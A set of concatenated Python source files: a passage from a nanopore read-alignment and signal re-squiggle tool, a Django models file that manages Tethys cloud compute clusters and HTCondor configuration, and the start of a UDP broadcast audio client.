= clip_m5_alignment(
alignVals, int(r_m5_record['tStart']),
r_m5_record['qStrand'], r_m5_record['tName'])
return (alignVals, genome_loc, start_clipped_bases,
end_clipped_bases)
def parse_m5_output(align_output, batch_reads_data):
alignments = dict(
(read_fn_sg, None) for read_fn_sg in batch_reads_data.keys())
for line in align_output:
r_m5_record = dict(zip(M5_FIELDS, line.strip().split()))
if len(r_m5_record) != len(M5_FIELDS):
continue
# store the alignment if none is stored for this read or
# if this read has the lowest map quality thus far
if alignments[r_m5_record['qName']] is None or \
int(alignments[r_m5_record['qName']]['score']) < \
int(r_m5_record['score']):
alignments[r_m5_record['qName']] = r_m5_record
batch_align_failed_reads = []
batch_align_data = {}
for read_fn_sg, r_m5_record in alignments.iteritems():
if r_m5_record is None:
batch_align_failed_reads.append(
('Alignment not produced.', read_fn_sg))
else:
try:
batch_align_data[read_fn_sg] = parse_m5_record(
r_m5_record)
except Exception as e:
batch_align_failed_reads.append((str(e), read_fn_sg))
return batch_align_failed_reads, batch_align_data
def parse_sam_record(r_sam_record, genome_index):
# parse cigar string
cigar = [
(int(reg_len), reg_type) for reg_len, reg_type in
CIGAR_PAT.findall(r_sam_record['cigar'])]
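    # e.g. the CIGAR string '5S10M2D3M' parses to [(5, 'S'), (10, 'M'), (2, 'D'), (3, 'M')]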
if len(cigar) < 1:
raise RuntimeError, 'Invalid cigar string produced.'
strand = '-' if int(r_sam_record['flag']) & 0x10 else '+'
if strand == '-':
cigar = cigar[::-1]
# record clipped bases and remove from query seq as well as cigar
qSeq = r_sam_record['seq'] if strand == '+' else nh.rev_comp(
r_sam_record['seq'])
start_clipped_bases = 0
end_clipped_bases = 0
# handle clipping elements (H and S)
if cigar[0][1] == 'H':
start_clipped_bases += cigar[0][0]
cigar = cigar[1:]
if cigar[-1][1] == 'H':
end_clipped_bases += cigar[-1][0]
cigar = cigar[:-1]
if cigar[0][1] == 'S':
start_clipped_bases += cigar[0][0]
qSeq = qSeq[cigar[0][0]:]
cigar = cigar[1:]
if cigar[-1][1] == 'S':
end_clipped_bases += cigar[-1][0]
qSeq = qSeq[:-cigar[-1][0]]
cigar = cigar[:-1]
tLen = sum([reg_len for reg_len, reg_type in cigar
if reg_type in 'MDN=X'])
tSeq = genome_index[r_sam_record['rName']][
int(r_sam_record['pos']) - 1:
int(r_sam_record['pos']) + tLen - 1]
if strand == '-': tSeq = nh.rev_comp(tSeq)
# check that cigar starts and ends with matched bases
while cigar[0][1] not in 'M=X':
if cigar[0][1] in 'IP':
tSeq = tSeq[cigar[0][0]:]
else:
qSeq = qSeq[cigar[0][0]:]
start_clipped_bases += cigar[0][0]
cigar = cigar[1:]
while cigar[-1][1] not in 'M=X':
if cigar[-1][1] in 'IP':
tSeq = tSeq[:-cigar[-1][0]]
else:
qSeq = qSeq[:-cigar[-1][0]]
            end_clipped_bases += cigar[-1][0]
cigar = cigar[:-1]
qLen = sum([reg_len for reg_len, reg_type in cigar
if reg_type in 'MIP=X'])
assert len(qSeq) == qLen, 'Read sequence from SAM and ' + \
        'corresponding cigar string do not agree.'
# create pairwise alignment via zipped pairs
alignVals = []
for reg_len, reg_type in cigar:
if reg_type in 'M=X':
alignVals.extend(zip(qSeq[:reg_len], tSeq[:reg_len]))
qSeq = qSeq[reg_len:]
tSeq = tSeq[reg_len:]
elif reg_type in 'IP':
alignVals.extend(zip(qSeq[:reg_len], repeat('-')))
qSeq = qSeq[reg_len:]
else:
alignVals.extend(zip(repeat('-'), tSeq[:reg_len]))
tSeq = tSeq[reg_len:]
return (alignVals, genomeLoc(
int(r_sam_record['pos']) - 1, strand, r_sam_record['rName']),
start_clipped_bases, end_clipped_bases)
def parse_sam_output(align_output, batch_reads_data, genome_index):
# create dictionary with empty slot to each read
alignments = dict(
(read_fn_sg, None) for read_fn_sg in batch_reads_data.keys())
for line in align_output:
if line.startswith('@'): continue
r_sam_record = dict(zip(SAM_FIELDS, line.strip().split()))
if len(r_sam_record) < len(SAM_FIELDS): continue
if r_sam_record['rName'] == '*': continue
# store the alignment if none is stored for this read or
# if this read has the lowest map quality thus far
qName = r_sam_record['qName'].replace('|||', ' ')
if alignments[qName] is None or \
int(alignments[qName]['mapq']) < \
int(r_sam_record['mapq']):
alignments[qName] = r_sam_record
batch_align_failed_reads = []
batch_align_data = {}
for read_fn_sg, r_sam_record in alignments.iteritems():
if r_sam_record is None:
batch_align_failed_reads.append(
('Alignment not produced. Potentially failed ' +
'to locate BWA index files.', read_fn_sg))
else:
try:
batch_align_data[read_fn_sg] = parse_sam_record(
r_sam_record, genome_index)
except Exception as e:
batch_align_failed_reads.append((str(e), read_fn_sg))
return batch_align_failed_reads, batch_align_data
def prep_graphmap_options(
genome_fn, read_fn, out_fn, output_format, num_align_ps):
return ['align', '-r', genome_fn, '-d', read_fn, '-o', out_fn,
'-L', output_format, '-t', str(num_align_ps)]
def prep_bwa_mem_options(genome_fn, read_fn, num_align_ps):
return ['mem', '-x', 'ont2d', '-v', '1', '-t', str(num_align_ps),
genome_fn, read_fn]
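# For example (hypothetical paths), prep_bwa_mem_options('genome.fa', 'reads.fasta', 4)
# returns ['mem', '-x', 'ont2d', '-v', '1', '-t', '4', 'genome.fa', 'reads.fasta'];
# align_to_genome prepends the mapper executable before passing the list to call().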
def align_to_genome(batch_reads_data, genome_fn, mapper_exe,
mapper_type, genome_index, num_align_ps,
output_format='sam'):
# prepare fasta text with batch reads
batch_reads_fasta = ''
for read_fn_sg, (_, _, basecalls, _, _) in \
batch_reads_data.iteritems():
# note spaces aren't allowed in read names so replace with
# vertical bars and undo to retain file names
batch_reads_fasta += ">" + read_fn_sg.replace(' ', '|||') + \
'\n' + ''.join(basecalls) + '\n'
read_fp = NamedTemporaryFile(suffix='.fasta')
read_fp.write(batch_reads_fasta)
read_fp.flush()
out_fp = NamedTemporaryFile()
# optionally suppress output from mapper with devnull sink
with open(os.devnull, 'w') as FNULL:
if mapper_type == 'graphmap':
mapper_options = prep_graphmap_options(
genome_fn, read_fp.name, out_fp.name,
output_format, num_align_ps)
stdout_sink = FNULL
elif mapper_type == 'bwa_mem':
mapper_options = prep_bwa_mem_options(
genome_fn, read_fp.name, num_align_ps)
stdout_sink = out_fp
else:
raise RuntimeError, 'Mapper not supported.'
try:
exitStatus = call([mapper_exe,] + mapper_options,
stdout=stdout_sink, stderr=FNULL)
out_fp.seek(0)
align_output = out_fp.readlines()
            # close files here so that they persist until
            # after the mapping call has finished
read_fp.close()
out_fp.close()
except:
# whole mapping call failed so all reads failed
return ([(
                'Problem running/parsing genome mapper. ' +
                'Ensure you have a compatible version installed. ' +
                'Potentially failed to locate BWA index files.',
read_fn_sg) for read_fn_sg
in batch_reads_data.keys()], [])
if output_format == 'sam':
batch_parse_failed_reads, batch_align_data = parse_sam_output(
align_output, batch_reads_data, genome_index)
elif output_format == 'm5':
batch_parse_failed_reads, batch_align_data = parse_m5_output(
align_output, batch_reads_data)
else:
raise RuntimeError, 'Mapper output type not supported.'
clip_fix_align_data = fix_all_clipped_bases(
batch_align_data, batch_reads_data)
return batch_parse_failed_reads, clip_fix_align_data
def fix_stay_states(
called_dat, starts_rel_to_read, basecalls,
read_start_rel_to_raw):
move_states = called_dat['move'][1:] > 0
start_clip = 0
event_change_state = move_states[0]
while not event_change_state:
if start_clip >= len(move_states) - 2:
raise RuntimeError, (
'Read is composed entirely of stay model ' +
'states and cannot be processed')
start_clip += 1
event_change_state = move_states[start_clip]
end_clip = 0
event_change_state = move_states[-1]
while not event_change_state:
end_clip += 1
event_change_state = move_states[-(end_clip+1)]
# clip all applicable data structures
move_states = move_states[start_clip:]
starts_rel_to_read = starts_rel_to_read[start_clip:]
basecalls = basecalls[start_clip:]
if end_clip > 0:
move_states = move_states[:-end_clip]
starts_rel_to_read = starts_rel_to_read[:-end_clip]
basecalls = basecalls[:-end_clip]
if start_clip > 0:
start_clip_obs = starts_rel_to_read[0]
starts_rel_to_read = starts_rel_to_read - start_clip_obs
read_start_rel_to_raw += start_clip_obs
# now actually remove internal stay states
move_states = np.insert(
move_states, (0, len(move_states) - 1), True)
starts_rel_to_read = starts_rel_to_read[move_states]
basecalls = basecalls[move_states[:-1]]
return starts_rel_to_read, basecalls, read_start_rel_to_raw
def get_read_data(fast5_fn, basecall_group, basecall_subgroup):
try:
fast5_data = h5py.File(fast5_fn, 'r')
except:
raise NotImplementedError, (
'Error opening file for alignment. This should have ' +
'been caught during the HDF5 prep phase. Check that there ' +
'are no other nanoraw processes or processes accessing ' +
'these HDF5 files running simultaneously.')
try:
# get albacore version, or if not specified set to 0.0
albacore_version = LooseVersion(fast5_data[
'/Analyses/' + basecall_group].attrs['version']
if 'version' in fast5_data['/Analyses/' +
basecall_group].attrs else "0.0")
called_dat = fast5_data[
'/Analyses/' + basecall_group + '/' + basecall_subgroup +
'/Events'].value
except:
raise RuntimeError, (
'No events or corrupted events in file. Likely a ' +
'segmentation error or mis-specified basecall-' +
'subgroups (--2d?).')
try:
raw_attrs = dict(
fast5_data['/Raw/Reads/'].values()[0].attrs.items())
except:
raise RuntimeError, (
'Raw data is not stored in Raw/Reads/Read_[read#] so ' +
'new segments cannot be identified.')
try:
channel_info = nh.get_channel_info(fast5_data)
fast5_data.close()
except:
raise RuntimeError, (
'Error getting channel information and closing fast5 file.')
read_id = raw_attrs['read_id']
abs_event_start = np.round(
called_dat['start'][0].astype(np.float64) *
channel_info.sampling_rate).astype(np.uint64)
if abs_event_start < raw_attrs['start_time']:
# allow off by one or two values as these are floating point
# errors in start time values
if abs_event_start >= raw_attrs['start_time'] - 2:
read_start_rel_to_raw = 0
else:
raise NotImplementedError, (
'Events appear to start before the raw signal.')
else:
read_start_rel_to_raw = int(
abs_event_start - raw_attrs['start_time'])
# check albacore version to determine which method to extract starts
# relative to the read.
# Before albacore version 1.0, events could be skipped so start times
# should be used. Since then events are not removed so the length
# slot is more reliable since it will have greater floating point
# precision. Relevant discussion on community forum here:
# https://community.nanoporetech.com/posts/albacore-zero-length-even
    # TODO: Once albacore stores integer values, another case
    # will be added here.
if albacore_version > LooseVersion("1.0"):
# compute event starts from length slot as start slot is less
# reliable due to storage as a float32
starts_rel_to_read = np.cumsum(np.concatenate(
[[0,], np.round(called_dat['length'] *
channel_info.sampling_rate).astype('int_')]))
else:
last_event = called_dat[-1]
# convert starts to float64 to minimize floating point errors
starts_rel_to_read = np.append(
called_dat['start'], last_event['start'] +
last_event['length']).astype(np.float64)
# round to float64 to minimize floating point errors
starts_rel_to_read = np.round(
starts_rel_to_read *
channel_info.sampling_rate).astype('int_') - abs_event_start
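    # In either branch starts_rel_to_read is in raw-signal sample units with one
    # more entry than there are events. For example (hypothetical values), event
    # lengths of [0.001, 0.002] seconds at a 4000 Hz sampling rate give per-event
    # sample counts [4, 8] and starts_rel_to_read == [0, 4, 12].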
basecalls = np.array([
event_state[2] for event_state in called_dat['model_state']])
if any(len(vals) <= 1 for vals in (
starts_rel_to_read, basecalls,
called_dat['model_state'])):
raise NotImplementedError, (
'One or no segments or signal present in read.')
if min(np.diff(starts_rel_to_read)) < 1:
raise NotImplementedError, (
'Zero length event present in input data.')
# remove stay states from the base caller
(starts_rel_to_read, basecalls,
read_start_rel_to_raw) = fix_stay_states(
called_dat, starts_rel_to_read, basecalls,
read_start_rel_to_raw)
return (read_start_rel_to_raw, starts_rel_to_read, basecalls,
channel_info, read_id)
def align_and_parse(
fast5s_to_process, genome_fn, mapper_exe, mapper_type,
genome_index, basecall_group, basecall_subgroups, num_align_ps):
batch_reads_data = {}
batch_get_data_failed_reads = []
for fast5_fn in fast5s_to_process:
for bc_subgroup in basecall_subgroups:
try:
read_data = get_read_data(
fast5_fn, basecall_group, bc_subgroup)
batch_reads_data[
bc_subgroup + ':::' + fast5_fn] = read_data
except Exception as e:
# uncomment to identify mysterious errors
#raise
batch_get_data_failed_reads.append((
str(e), bc_subgroup + ':::' + fast5_fn))
batch_align_failed_reads, batch_align_data = align_to_genome(
batch_reads_data, genome_fn, mapper_exe, mapper_type,
genome_index, num_align_ps)
    # regroup reads by filename (for 2D reads to be processed together
    # and to avoid the same HDF5 file being opened simultaneously)
fn_batch_align_data = defaultdict(list)
    for read_fn_sg, sg_align_data in batch_align_data.iteritems():
        fast5_fn = read_fn_sg.split(':::')[-1]
        fn_batch_align_data[fast5_fn].append(sg_align_data)
# uncomment to identify mysterious errors
#print "Get data errors: " + str(batch_get_data_failed_reads)
#print "Align read errors: " + str(batch_align_failed_reads)
return (batch_get_data_failed_reads + batch_align_failed_reads,
fn_batch_align_data)
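# align_and_parse returns a combined list of (error, read identifier) failures and
# fn_batch_align_data, a dict mapping each FAST5 filename to the list of alignment
# tuples produced by parse_sam_record/parse_m5_record for its basecall subgroups.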
def prep_fast5(fast5_fn, basecall_group, corrected_group,
overwrite, in_place):
# several checks to prepare the FAST5 file for correction before
# processing to save compute
if not in_place:
return ('Not currently implementing new hdf5 file writing.',
fast5_fn)
# check that the file is writeable before trying to correct
if not os.access(fast5_fn, os.W_OK):
return ('FAST5 file is not writable.', fast5_fn)
try:
with h5py.File(fast5_fn, 'r') as read_data:
if '/Analyses/' + basecall_group not in read_data:
return (
'FAST5 basecall-group or Analyses group does ' +
'not exist. Likely these reads either have not ' +
'been basecalled (with event storage) or are mux ' +
'scan files. Also check --basecall-group and ' +
'--basecall-subgroups arguments against these ' +
'files.', fast5_fn)
if not overwrite and '/Analyses/' + corrected_group \
in read_data:
return (
"Raw genome corrected data exists for " +
"this read and --overwrite is not set.", fast5_fn)
except:
return ('Error opening file. Likely a corrupted file.',
fast5_fn)
try:
# create group to store data
with h5py.File(fast5_fn, 'r+') as read_data:
analyses_grp = read_data['/Analyses']
# check for previously created correction group and
# delete if it exists
if corrected_group in analyses_grp:
del analyses_grp[corrected_group]
corr_grp = analyses_grp.create_group(corrected_group)
corr_grp.attrs['nanoraw_version'] = nh.NANORAW_VERSION
corr_grp.attrs['basecall_group'] = basecall_group
except:
return (
'Error creating new fast5 group or writing to fast5 file.',
fast5_fn)
return
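# prep_fast5 returns None when the file is ready for correction; any problem is
# reported as an (error_message, fast5_fn) tuple, which align_reads collects into
# batch_prep_failed_reads instead of raising.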
def align_reads(
fast5_batch, genome_fn, mapper_exe, mapper_type, genome_index,
basecall_group, basecall_subgroups, corrected_group,
basecalls_q, overwrite, num_align_ps, in_place=True):
batch_prep_failed_reads = []
fast5s_to_process = []
for fast5_fn in fast5_batch:
prep_result = prep_fast5(
fast5_fn, basecall_group, corrected_group,
overwrite, in_place)
if prep_result is None:
fast5s_to_process.append(fast5_fn)
else:
batch_prep_failed_reads.append(prep_result)
batch_align_failed_reads, batch_align_data = align_and_parse(
fast5s_to_process, genome_fn, mapper_exe, mapper_type,
genome_index, basecall_group, basecall_subgroups, num_align_ps)
for fast5_fn, sgs_align_data in batch_align_data.iteritems():
basecalls_q.put((fast5_fn, sgs_align_data))
# uncomment to identify mysterious errors
#print "Prep reads fail: " + str(batch_prep_failed_reads)
#print "Align reads fail: " + str(batch_align_failed_reads)
return batch_prep_failed_reads + batch_align_failed_reads
def alignment_worker(
fast5_q, basecalls_q, failed_reads_q, genome_fn,
mapper_exe, mapper_type, basecall_group, basecall_subgroups,
corrected_group, overwrite, num_align_ps):
# this is only needed for sam output format (not m5)
genome_index = nh.parse_fasta(genome_fn)
while not fast5_q.empty():
try:
fast5_batch = fast5_q.get(block=False)
except Queue.Empty:
break
batch_failed_reads = align_reads(
fast5_batch, genome_fn, mapper_exe, mapper_type,
genome_index, basecall_group, basecall_subgroups,
corrected_group, basecalls_q, overwrite, num_align_ps)
for failed_read in batch_failed_reads:
failed_reads_q.put(failed_read)
return
def resquiggle_all_reads(
fast5_fns, genome_fn, mapper_exe, mapper_type,
basecall_group, basecall_subgroups, corrected_group, norm_type,
outlier_thresh, timeout, num_cpts_limit, overwrite,
align_batch_size, num_align_ps, align_threads_per_proc,
num_resquiggle_ps, compute_sd, pore_model):
manager = mp.Manager()
fast5_q = manager.Queue()
# set maximum number of parsed basecalls to sit in the middle queue
basecalls_q = manager.Queue(
align_batch_size * ALIGN_BATCH_MULTIPLIER)
failed_reads_q = manager.Queue()
num_reads = 0
fast5_batch = []
for fast5_fn in fast5_fns:
num_reads += 1
fast5_batch.append(fast5_fn)
# put batches of reads in queue
if num_reads % align_batch_size == 0:
fast5_q.put(fast5_batch)
fast5_batch = []
if len(fast5_batch) > 0:
fast5_q.put(fast5_batch)
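    # For example (hypothetical sizes), 1050 input files with align_batch_size=100
    # put ten full batches on fast5_q above plus this final batch of 50 files.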
align_args = (
fast5_q, basecalls_q, failed_reads_q, genome_fn,
mapper_exe, mapper_type, basecall_group, basecall_subgroups,
corrected_group, overwrite, align_threads_per_proc)
align_ps = []
for p_id in xrange(num_align_ps):
p = mp.Process(target=alignment_worker, args=align_args)
p.start()
align_ps.append(p)
rsqgl_args = (basecalls_q, failed_reads_q, basecall_group,
corrected_group, norm_type, outlier_thresh, timeout,
num_cpts_limit, compute_sd, pore_model)
resquiggle_ps = []
for p_id in xrange(num_resquiggle_ps):
p = mp.Process(target=resquiggle_worker, args=rsqgl_args)
p.start()
resquiggle_ps.append(p)
if VERBOSE: sys.stderr.write(
'Correcting ' + str(num_reads) + ' files with ' +
str(len(basecall_subgroups)) + ' subgroup(s)/read(s) ' +
'each (Will print a dot for each 100 files completed).\n')
failed_reads = defaultdict(list)
while any(p.is_alive() for p in align_ps):
try:
errorType, fn = failed_reads_q.get(block=False)
failed_reads[errorType].append(fn)
except Queue.Empty:
sleep(1)
continue
    # add None entries to basecalls_q to indicate that all reads have
    # been basecalled and processed
for _ in xrange(num_resquiggle_ps):
basecalls_q.put((None, None))
while any(p.is_alive() for p in resquiggle_ps):
try:
errorType, fn = failed_reads_q.get(block=False)
failed_reads[errorType].append(fn)
except Queue.Empty:
sleep(1)
continue
# empty any entries left in queue after processes have finished
while not failed_reads_q.empty():
errorType, fn = failed_reads_q.get(block=False)
failed_reads[errorType].append(fn)
# print newline after read progress dots
if VERBOSE: sys.stderr.write('\n')
return dict(failed_reads)
def resquiggle_main(args):
global VERBOSE
VERBOSE = not args.quiet
# currently required, but adding new mappers shortly
if args.graphmap_executable is None:
if args.bwa_mem_executable is None:
sys.stderr.write(
'*' * 60 + '\nERROR: Must provide either a ' + \
'graphmap or bwa-mem executable.\n' + '*' * 60 + '\n')
sys.exit()
mapper_exe = args.bwa_mem_executable
mapper_type = 'bwa_mem'
else:
mapper_exe = args.graphmap_executable
mapper_type = 'graphmap'
if VERBOSE: sys.stderr.write('Getting file list.\n')
try:
if args.fast5_pattern or args.recursive:
fast5_pat = "*/*.fast5" if args.recursive else \
args.fast5_pattern
files = glob(os.path.join(args.fast5_basedir, fast5_pat))
else:
files = [
os.path.join(args.fast5_basedir, fn)
for fn in os.listdir(args.fast5_basedir)
if os.path.isfile(os.path.join(args.fast5_basedir, fn))]
except OSError:
sys.stderr.write(
'*' * 60 + '\nERROR: One of the directories does not ' +
'appear to be accessible. Check directory permissions.\n' +
'*' * 60 + '\n')
sys.exit()
if len(files) < 1:
sys.stderr.write(
'*' * 60 + '\nERROR: No files identified in the specified ' +
'directories. If files are stored in subdirectories ' +
'(e.g. 0/, 1/, ...) specify the --recursive or ' +
'--fast5-pattern "*/*.fast5" options appropriately.\n' +
'*' * 60 + '\n')
sys.exit()
outlier_thresh = args.outlier_threshold if (
args.outlier_threshold > 0) else None
# resolve processor and thread arguments
num_proc = 2 if args.processes < 2 else args.processes
align_threads_per_proc = \
max(int(num_proc / (2 * args.align_processes)), 1) \
if args.align_threads_per_process is None else \
args.align_threads_per_process
num_resquiggle_ps = int(num_proc / 2) \
if args.resquiggle_processes is None \
else args.resquiggle_processes
# whether or not to skip SD calculation due to time
compute_sd = not args.skip_event_stdev
# parse pore model if k-mer conditional corrected pA values
# are requested
pore_model = None
if args.normalization_type == 'pA':
pore_model = nh.parse_pore_model(args.pore_model_filename)
failed_reads = resquiggle_all_reads(
files, args.genome_fasta, mapper_exe, mapper_type,
args.basecall_group, args.basecall_subgroups,
args.corrected_group, args.normalization_type, outlier_thresh,
args.timeout, args.cpts_limit, args.overwrite,
args.alignment_batch_size, args.align_processes,
align_threads_per_proc, num_resquiggle_ps, compute_sd,
pore_model)
sys.stderr.write('Failed reads summary:\n' + '\n'.join(
"\t" + err + " :\t" + str(len(fns))
for err, fns in failed_reads.items()) + '\n')
if args.failed_reads_filename is not None:
with open(args.failed_reads_filename, 'w') as fp:
fp.write('\n'.join((
err + '\t' + ','.join(fns)
for err, fns in failed_reads.items())) + '\n')
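    # Each line of the optional failed-reads file is one error type followed by a
    # tab and a comma-separated list of the read identifiers that hit that error,
    # e.g. (hypothetical): "Alignment not produced.<TAB>template:::read1.fast5".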
return
def args_and_main():
resquiggle_main(
option_parsers.get_resquiggle_parser().parse_args())
return
if __name__ == '__main__':
args_and_main()
|
models.py
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import pre_save, post_save, post_delete
from django.dispatch import receiver
from django.utils import timezone
from tethys_compute import TETHYSCLUSTER_CFG_FILE, TETHYSCLUSTER_CFG_TEMPLATE
import os, re
from multiprocessing import Process
from tethyscluster import config as tethyscluster_config
class SettingsCategory(models.Model):
name = models.CharField(max_length=30)
class Meta:
verbose_name = 'Settings Category'
verbose_name_plural = 'Settings'
def __unicode__(self):
return self.name
class Setting(models.Model):
name = models.TextField(max_length=30)
content = models.TextField(max_length=500, blank=True)
date_modified = models.DateTimeField('date modified', auto_now=True)
category = models.ForeignKey(SettingsCategory)
def __unicode__(self):
return self.name
@classmethod
def as_dict(cls):
all_settings = cls.objects.all()
settings_dict = dict()
for setting in all_settings:
code_name = setting.name.lower().replace(' ', '_')
settings_dict[code_name] = setting.content
return settings_dict
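# For example (hypothetical setting), a Setting named 'Scheduler IP' with content
# '10.0.0.5' appears in Setting.as_dict() as {'scheduler_ip': '10.0.0.5'}; the
# post_save receiver below interpolates this dict into TETHYSCLUSTER_CFG_TEMPLATE.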
@receiver(post_save, sender=Setting)
def setting_post_save(sender, instance, created, raw, using, update_fields, **kwargs):
settings = Setting.as_dict()
with open(TETHYSCLUSTER_CFG_FILE, 'w') as config_file:
config_file.write(TETHYSCLUSTER_CFG_TEMPLATE % settings)
class Cluster(models.Model):
STATUSES = (
('STR', 'Starting'),
('RUN', 'Running'),
('STP', 'Stopped'),
('UPD', 'Updating'),
('DEL', 'Deleting'),
('ERR', 'Error'),
)
STATUS_DICT = {k:v for v,k in STATUSES}
PROVIDERS = (
('AWS', 'Amazon Web Services'),
('AZR', 'Microsoft Azure'),
)
try:
TC_MANAGER = tethyscluster_config.get_cluster_manager()
except Exception as e:
print e.message
TC_MANAGER = None
_name = models.CharField(max_length=30, unique=True, default='tethys_default')
_size = models.IntegerField(default=1)
_status = models.CharField(max_length=3, choices=STATUSES, default=STATUS_DICT['Starting'])
_cloud_provider = models.CharField(max_length=3, choices=PROVIDERS, default=PROVIDERS[0][0])
_master_image_id = models.CharField(max_length=9, blank=True, null=True)
_node_image_id = models.CharField(max_length=9, blank=True, null=True)
_master_instance_type = models.CharField(max_length=20, blank=True, null=True)
_node_instance_type = models.CharField(max_length=20, blank=True, null=True)
_tethys_cluster = None
@classmethod
def create(cls, name, size=1):
return cls(name=name, size=size)
def __unicode__(self):
return '%s (%d-node)' % (self.name, self.size)
@property
def name(self):
return self._name
@name.setter
def name(self, name):
self._name = name
@property
def size(self):
return self._size
@size.setter
def size(self, size):
object.__setattr__(self, '_size', size)
@property
def status(self):
self._update_status()
field = self._meta.get_field('_status')
return self._get_FIELD_display(field)
@property
def cloud_provider(self):
field = self._meta.get_field('_cloud_provider')
return self._get_FIELD_display(field)
@property
def tethys_cluster(self):
if not self._tethys_cluster:
try:
self._tethys_cluster = self.TC_MANAGER.get_cluster_or_none(self.name)
except Exception as e:
print e.message
return self._tethys_cluster
def create_tethys_cluster(self):
tc = self.tethys_cluster
if not tc:
try:
tc = self.TC_MANAGER.get_default_template_cluster(self.name)
tc.update({'cluster_size':self.size})
tc.start(validate_only=False)
self._tethys_cluster = tc
self.connect_scheduler_and_master()
self.save()
except Exception as e:
print e.message
else:
pass
#raise
def connect_scheduler_and_master(self):
def add_value_to_condor_config(config_file, attr, value):
text = config_file.read()
text_parts = re.split('^\s*%s ?= ?' % (attr, ), text, flags=re.IGNORECASE|re.M)
if len(text_parts) > 1:
last_part = text_parts.pop()
new_last_part = '%s %s' % (value, last_part)
text_parts.append(new_last_part)
join_attr = '%s = ' % (attr, )
new_text = join_attr.join(text_parts)
else:
new_text = '%s\n%s = %s\n' % (text, attr, value)
config_file.seek(0)
config_file.write(new_text)
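        # For example (hypothetical config): if the file already contains
        # 'FLOCK_FROM = 1.2.3.4' and value is '5.6.7.8', the line becomes
        # 'FLOCK_FROM = 5.6.7.8 1.2.3.4'; if the attribute is absent, a new
        # 'FLOCK_FROM = 5.6.7.8' line is appended to the file.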
def get_public_ip():
import urllib2, json
json_response = urllib2.urlopen('http://ip.jsontest.com/').read()
host_ip = json.loads(json_response)['ip']
return host_ip
tc = self.tethys_cluster
if tc:
master = tc.master_node
settings = Setting.as_dict()
scheduler_ip = settings['scheduler_ip'] or get_public_ip()
master_local_config_file = master.ssh.execute('condor_config_val local_config_file')[0]
with master.ssh.remote_file(master_local_config_file, mode='r+') as config_file:
add_value_to_condor_config(config_file, 'FLOCK_FROM', scheduler_ip)
p = os.popen('condor_config_val local_config_file')
local_config_file = p.read().strip('\n')
p.close()
with open(local_config_file, 'r+') as config_file:
add_value_to_condor_config(config_file, 'FLOCK_TO', master.ip_address)
def update_tethys_cluster(self):
#TODO check if connection to master needs to be updated
tc = self.tethys_cluster
if tc:
tc_size = len(tc.nodes)
delta = abs(tc_size - self.size)
if delta != 0:
cmd = self._add_nodes if self.size > tc_size else self._remove_nodes
cmd(delta)
else:
self.create_tethys_cluster()
#raise
def delete_tethys_cluster(self):
#TODO remove master_ip from local condor config
tc = self.tethys_cluster
if tc:
tc.terminate_cluster(force=True)
def _add_nodes(self, num_nodes, image_id=None, instance_type=None, spot_bid=None):
tc = self.tethys_cluster
tc.add_nodes(num_nodes, image_id=image_id, instance_type=instance_type, spot_bid=spot_bid)
self._sync()
def _remove_nodes(self, num_nodes):
tc = self.tethys_cluster
tc.remove_nodes(num_nodes=num_nodes, force=True)
self._sync()
def _update_status(self):
old_status = self._status
tc = self.tethys_cluster
if tc is None:
if self._status == self.STATUS_DICT['Starting']:
pass
elif self._status == self.STATUS_DICT['Deleting']:
self.delete() #TODO: Not so sure this will work
else:
self._status = self.STATUS_DICT['Error']
elif self._status == self.STATUS_DICT['Updating']:
if tc.is_cluster_up() and len(tc.nodes) == self.size:
self._status = self.STATUS_DICT['Running']
elif (self._status == self.STATUS_DICT['Starting'] or self._status == self.STATUS_DICT['Stopped']) and tc.is_cluster_up():
self._status = self.STATUS_DICT['Running']
elif self._status == self.STATUS_DICT['Running']:
if tc.is_cluster_stopped():
self._status = self.STATUS_DICT['Stopped']
elif not tc.is_valid():
self._status = self.STATUS_DICT['Error']
@receiver(pre_save, sender=Cluster)
def cluster_pre_save(sender, instance, raw, using, update_fields, **kwargs):
instance._update_status()
@receiver(post_save, sender=Cluster)
def cluster_post_save(sender, instance, created, raw, using, update_fields, **kwargs):
if created:
target = instance.create_tethys_cluster
else:
target = instance.update_tethys_cluster
process = Process(target=target)
process.start()
@receiver(post_delete, sender=Cluster)
def cluster_post_delete(sender, instance, **kwargs):
process = Process(target=instance.delete_tethys_cluster)
process.start()
class TethysJob(models.Model):
STATUSES = (
('PEN', 'Pending'),
('SUB', 'Submitted'),
('RUN', 'Running'),
('COM', 'Complete'),
('ERR', 'Error'),
)
name = models.CharField(max_length=30)
user = models.ForeignKey(User)
group = models.CharField(max_length=30)
    # pass the callable (not a call) so the timestamp is evaluated when each
    # row is created rather than once at import time
    creation_time = models.DateTimeField(default=timezone.now)
submission_time = models.DateTimeField()
completion_time = models.DateTimeField()
status = models.CharField(max_length=3, choices=STATUSES, default=STATUSES[0][0])
def execute(self):
"""
:return:
"""
pass
def stop(self):
"""
:return:
"""
pass
def pause(self):
"""
:return:
"""
pass
class CondorJob(TethysJob):
scheduler = models.CharField(max_length=12)
ami = models.CharField(max_length=9)
@property
def condorpy_job(self):
pass
|
clientAudio.py
|
from array import array
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM, SOL_SOCKET, SO_BROADCAST, SO_REUSEPORT, gethostname, gethostbyname
from threading import Thread
import pyaudio
HOST = '127.0.0.1'
PORT = 4000
BufferSize = 4096
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
CHUNK = 256
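# With paInt16 samples (2 bytes) and 2 channels, each CHUNK of 256 frames read from
# the stream is 256 * 2 * 2 = 1024 bytes per datagram, well under the 4096-byte
# BufferSize used when receiving.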
class Client:
def __init__(self, host='', port=37020, buffer_size=4096):
self._host = host
self._port = port
self._buffer_size = buffer_size
self._sock = socket(AF_INET, SOCK_DGRAM) # UDP
self._sock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self._sock.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)
audio = pyaudio.PyAudio()
self._stream = audio.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, output=True,
frames_per_buffer=CHUNK)
def start(self):
self._sock.bind((self._host, self._port))
Thread(target=self._handle_audio_in).start()
Thread(target=self._handle_audio_out).start()
def _handle_audio_in(self):
while True:
# data = self._recvall(self._buffer_size)
data, addr = self._sock.recvfrom(self._buffer_size)
print(f'{addr[0]}:{gethostbyname(gethostname())}')
if addr[0] != gethostbyname(gethostname()):
self._stream.write(data)
    def _recvall(self, size):
        databytes = b''
        while len(databytes) != size:
            to_read = size - len(databytes)
